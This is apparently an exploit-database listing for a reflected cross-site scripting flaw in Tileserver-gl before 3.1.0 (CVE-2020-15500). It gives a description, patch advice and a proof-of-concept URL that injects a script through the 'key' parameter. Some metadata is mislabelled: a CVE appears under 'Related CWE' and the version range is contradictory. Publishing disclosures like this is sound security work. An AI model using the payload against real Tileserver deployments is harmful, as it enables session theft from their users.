header-logo
Suggest Exploit
vendor:
Tileserver-gl
by:
Akash Chathoth
8.8
CVSS
HIGH
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: Tileserver-gl
Affected Version From: <3.1.0
Affected Version To: 2.6.0
Patch Exists: YES
Related CWE: 2020-15500
CPE: a:maptiler:tileserver-gl
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2021

Tileserver-gl 3.0.0 – ‘key’ Reflected Cross-Site Scripting (XSS)

A reflected cross-site scripting (XSS) vulnerability exists in Tileserver-gl versions <3.1.0. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the victim. The malicious URL contains a malicious script that is executed in the victim's browser when the URL is accessed. The malicious script can be used to steal the victim's session information or to perform other malicious activities.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Tileserver-gl.
Source

Exploit-DB raw data:

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>

Navigation

Suggest Exploit

Services By CQR